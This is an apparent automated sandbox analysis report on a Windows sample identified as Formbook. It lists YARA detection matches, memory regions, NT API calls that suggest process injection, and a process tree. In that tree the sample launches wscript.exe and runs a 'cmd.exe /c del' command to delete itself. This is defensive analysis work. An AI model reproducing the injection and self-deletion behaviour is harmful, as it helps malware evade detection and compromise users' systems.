Source: 00000008.00000000.378629628.0000000007957000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.378629628.0000000007957000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.436667647.0000000000E90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.436667647.0000000000E90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.562536876.0000000001350000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.562536876.0000000001350000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.562301653.0000000001010000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.562301653.0000000001010000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.436706282.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.436706282.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: 9LjOeq9jnl.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 7.2.9LjOeq9jnl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.9LjOeq9jnl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.9LjOeq9jnl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.9LjOeq9jnl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.9LjOeq9jnl.exe.3b9bf30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.9LjOeq9jnl.exe.3b9bf30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.9LjOeq9jnl.exe.3b50d10.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.9LjOeq9jnl.exe.3b50d10.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.396784808.0000000007957000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.396784808.0000000007957000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.378629628.0000000007957000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.378629628.0000000007957000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.436667647.0000000000E90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.436667647.0000000000E90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.562536876.0000000001350000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.562536876.0000000001350000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.562301653.0000000001010000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.562301653.0000000001010000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.436706282.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.436706282.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 9LjOeq9jnl.exe PID: 244, type: MEMORYSTR	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: Process Memory Space: 9LjOeq9jnl.exe PID: 4348, type: MEMORYSTR	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 0_2_009B35C4	0_2_009B35C4
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 0_2_010AEA40	0_2_010AEA40
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 0_2_010AEA50	0_2_010AEA50
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 0_2_010ACAAC	0_2_010ACAAC
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 0_2_009B2050	0_2_009B2050
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 1_2_001A35C4	1_2_001A35C4
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 1_2_001A2050	1_2_001A2050
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 2_2_006635C4	2_2_006635C4
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 2_2_0106C1B4	2_2_0106C1B4
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 2_2_0106E600	2_2_0106E600
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 2_2_0106E610	2_2_0106E610
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 2_2_00662050	2_2_00662050
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_00401030	7_2_00401030
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_0041D15F	7_2_0041D15F
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_0041C98F	7_2_0041C98F
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_0041BAC2	7_2_0041BAC2
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_00408C7B	7_2_00408C7B
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_00408C3B	7_2_00408C3B
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_00408C80	7_2_00408C80
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_0041C5CC	7_2_0041C5CC
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_00402D87	7_2_00402D87
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_00402D90	7_2_00402D90
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_00402FB0	7_2_00402FB0
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_008935C4	7_2_008935C4
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_00892050	7_2_00892050
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B920A0	17_2_04B920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7B090	17_2_04B7B090
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C320A8	17_2_04C320A8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7841F	17_2_04B7841F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21002	17_2_04C21002
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B92581	17_2_04B92581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7D5E0	17_2_04B7D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B60D20	17_2_04B60D20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C31D55	17_2_04C31D55
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B84120	17_2_04B84120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6F900	17_2_04B6F900
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C32D07	17_2_04C32D07
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C32EF7	17_2_04C32EF7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B86E30	17_2_04B86E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9EBB0	17_2_04B9EBB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C31FF1	17_2_04C31FF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009AC98F	17_2_009AC98F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00998C80	17_2_00998C80
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00998C3B	17_2_00998C3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00998C7B	17_2_00998C7B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00992D90	17_2_00992D90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00992D87	17_2_00992D87
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009AC5C0	17_2_009AC5C0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00992FB0	17_2_00992FB0

Source: C:\Windows\SysWOW64\wscript.exe

Code function: String function: 04B6B150 appears 35 times

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_004185C0 NtCreateFile,	7_2_004185C0
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_00418670 NtReadFile,	7_2_00418670
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_004186F0 NtClose,	7_2_004186F0
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_004187A0 NtAllocateVirtualMemory,	7_2_004187A0
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_0041866E NtReadFile,	7_2_0041866E
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 7_2_0041879A NtAllocateVirtualMemory,	7_2_0041879A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9860 NtQuerySystemInformation,LdrInitializeThunk,	17_2_04BA9860
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9840 NtDelayExecution,LdrInitializeThunk,	17_2_04BA9840
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA99A0 NtCreateSection,LdrInitializeThunk,	17_2_04BA99A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA95D0 NtClose,LdrInitializeThunk,	17_2_04BA95D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	17_2_04BA9910
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9540 NtReadFile,LdrInitializeThunk,	17_2_04BA9540
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA96E0 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_04BA96E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA96D0 NtCreateKey,LdrInitializeThunk,	17_2_04BA96D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9660 NtAllocateVirtualMemory,LdrInitializeThunk,	17_2_04BA9660
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9650 NtQueryValueKey,LdrInitializeThunk,	17_2_04BA9650
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9A50 NtCreateFile,LdrInitializeThunk,	17_2_04BA9A50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9780 NtMapViewOfSection,LdrInitializeThunk,	17_2_04BA9780
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9FE0 NtCreateMutant,LdrInitializeThunk,	17_2_04BA9FE0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9710 NtQueryInformationToken,LdrInitializeThunk,	17_2_04BA9710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA98A0 NtWriteVirtualMemory,	17_2_04BA98A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA98F0 NtReadVirtualMemory,	17_2_04BA98F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9820 NtEnumerateKey,	17_2_04BA9820
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BAB040 NtSuspendThread,	17_2_04BAB040
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA95F0 NtQueryInformationFile,	17_2_04BA95F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA99D0 NtCreateProcessEx,	17_2_04BA99D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BAAD30 NtSetContextThread,	17_2_04BAAD30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9520 NtWaitForSingleObject,	17_2_04BA9520
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9560 NtWriteFile,	17_2_04BA9560
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9950 NtQueueApcThread,	17_2_04BA9950
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9A80 NtOpenDirectoryObject,	17_2_04BA9A80
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9A20 NtResumeThread,	17_2_04BA9A20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9610 NtEnumerateValueKey,	17_2_04BA9610
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9A10 NtQuerySection,	17_2_04BA9A10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9A00 NtProtectVirtualMemory,	17_2_04BA9A00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9670 NtQueryInformationProcess,	17_2_04BA9670
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BAA3B0 NtGetContextThread,	17_2_04BAA3B0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA97A0 NtUnmapViewOfSection,	17_2_04BA97A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9730 NtQueryVirtualMemory,	17_2_04BA9730
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BAA710 NtOpenProcessToken,	17_2_04BAA710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9B00 NtSetValueKey,	17_2_04BA9B00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9770 NtSetInformationFile,	17_2_04BA9770
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BAA770 NtOpenThread,	17_2_04BAA770
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA9760 NtOpenProcess,	17_2_04BA9760
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009A85C0 NtCreateFile,	17_2_009A85C0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009A86F0 NtClose,	17_2_009A86F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009A8670 NtReadFile,	17_2_009A8670
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009A87A0 NtAllocateVirtualMemory,	17_2_009A87A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009A866E NtReadFile,	17_2_009A866E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_009A879A NtAllocateVirtualMemory,	17_2_009A879A

Source: 9LjOeq9jnl.exe, 00000000.00000002.303323047.0000000000A50000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamecDisplayClass1.exe6 vs 9LjOeq9jnl.exe
Source: 9LjOeq9jnl.exe, 00000000.00000002.304072642.00000000010DA000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 9LjOeq9jnl.exe
Source: 9LjOeq9jnl.exe, 00000000.00000002.309542142.0000000003E19000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameStaticArrayInitTypeSize2.exe6 vs 9LjOeq9jnl.exe
Source: 9LjOeq9jnl.exe, 00000000.00000002.309542142.0000000003E19000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUI.dll< vs 9LjOeq9jnl.exe
Source: 9LjOeq9jnl.exe, 00000000.00000002.305266338.0000000002E42000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs 9LjOeq9jnl.exe
Source: 9LjOeq9jnl.exe, 00000000.00000002.312983865.0000000005340000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameColladaLoader.dll4 vs 9LjOeq9jnl.exe
Source: 9LjOeq9jnl.exe, 00000001.00000002.301849264.0000000000240000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamecDisplayClass1.exe6 vs 9LjOeq9jnl.exe
Source: 9LjOeq9jnl.exe, 00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUI.dll< vs 9LjOeq9jnl.exe
Source: 9LjOeq9jnl.exe, 00000002.00000000.302385302.0000000000700000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamecDisplayClass1.exe6 vs 9LjOeq9jnl.exe
Source: 9LjOeq9jnl.exe, 00000002.00000002.341688942.0000000002A51000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameColladaLoader.dll4 vs 9LjOeq9jnl.exe
Source: 9LjOeq9jnl.exe, 00000002.00000002.340164343.0000000000468000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameStaticArrayInitTypeSize2.exe6 vs 9LjOeq9jnl.exe
Source: 9LjOeq9jnl.exe, 00000007.00000002.439553188.00000000033C0000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs 9LjOeq9jnl.exe
Source: 9LjOeq9jnl.exe, 00000007.00000000.339419222.0000000000930000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamecDisplayClass1.exe6 vs 9LjOeq9jnl.exe
Source: 9LjOeq9jnl.exe, 00000007.00000002.437631998.00000000014CF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 9LjOeq9jnl.exe
Source: 9LjOeq9jnl.exe	Binary or memory string: OriginalFilenamecDisplayClass1.exe6 vs 9LjOeq9jnl.exe

Source: 9LjOeq9jnl.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 9LjOeq9jnl.exe

ReversingLabs: Detection: 32%

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe

File read: C:\Users\user\Desktop\9LjOeq9jnl.exe:Zone.Identifier

Jump to behavior

Source: 9LjOeq9jnl.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9LjOeq9jnl.exe 'C:\Users\user\Desktop\9LjOeq9jnl.exe'
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process created: C:\Users\user\Desktop\9LjOeq9jnl.exe C:\Users\user\Desktop\9LjOeq9jnl.exe
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process created: C:\Users\user\Desktop\9LjOeq9jnl.exe C:\Users\user\Desktop\9LjOeq9jnl.exe
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process created: C:\Users\user\Desktop\9LjOeq9jnl.exe C:\Users\user\Desktop\9LjOeq9jnl.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\9LjOeq9jnl.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process created: C:\Users\user\Desktop\9LjOeq9jnl.exe C:\Users\user\Desktop\9LjOeq9jnl.exe	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process created: C:\Users\user\Desktop\9LjOeq9jnl.exe C:\Users\user\Desktop\9LjOeq9jnl.exe	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process created: C:\Users\user\Desktop\9LjOeq9jnl.exe C:\Users\user\Desktop\9LjOeq9jnl.exe	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\9LjOeq9jnl.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9LjOeq9jnl.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@13/1@5/3

